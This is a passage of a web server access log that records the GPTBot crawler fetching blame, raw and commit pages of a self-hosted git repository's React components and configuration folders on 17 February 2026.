AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" -[17/Feb/2026:13:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" -[17/Feb/2026:13:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15903] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14296] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" -[17/Feb/2026:13:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 14960] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" -[17/Feb/2026:13:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16912] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" -[17/Feb/2026:13:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14298] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" -[17/Feb/2026:13:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14961] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" -[17/Feb/2026:13:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" -[17/Feb/2026:13:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" -[17/Feb/2026:13:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" -[17/Feb/2026:13:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" -[17/Feb/2026:13:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" -[17/Feb/2026:13:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" -[17/Feb/2026:13:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" -[17/Feb/2026:13:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" -[17/Feb/2026:13:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 13782] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" -[17/Feb/2026:13:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" -[17/Feb/2026:13:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 13781] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" -[17/Feb/2026:13:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" -[17/Feb/2026:13:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" -[17/Feb/2026:13:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" -[17/Feb/2026:13:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" -[17/Feb/2026:13:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" -[17/Feb/2026:13:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 11838] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" -[17/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 137310] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" -[17/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" -[17/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" -[17/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 13001] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:13:20:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" -[17/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" [Client 74.7.227.38] [Length 10727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" [Client 74.7.227.38] [Length 10722] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" -[17/Feb/2026:13:20:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" -[17/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" [Client 74.7.227.38] [Length 10720] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10831] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" -[17/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" [Client 74.7.227.38] [Length 10724] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14187] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16463] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15539] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 13920] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/monthly" [Client 74.7.227.38] [Length 8599] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11958] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10700] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" -[17/Feb/2026:13:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10794] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" -[17/Feb/2026:13:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10155] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" -[17/Feb/2026:13:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" -[17/Feb/2026:13:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" -[17/Feb/2026:13:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" -[17/Feb/2026:13:20:42 +0000] - 200 200 - GET https 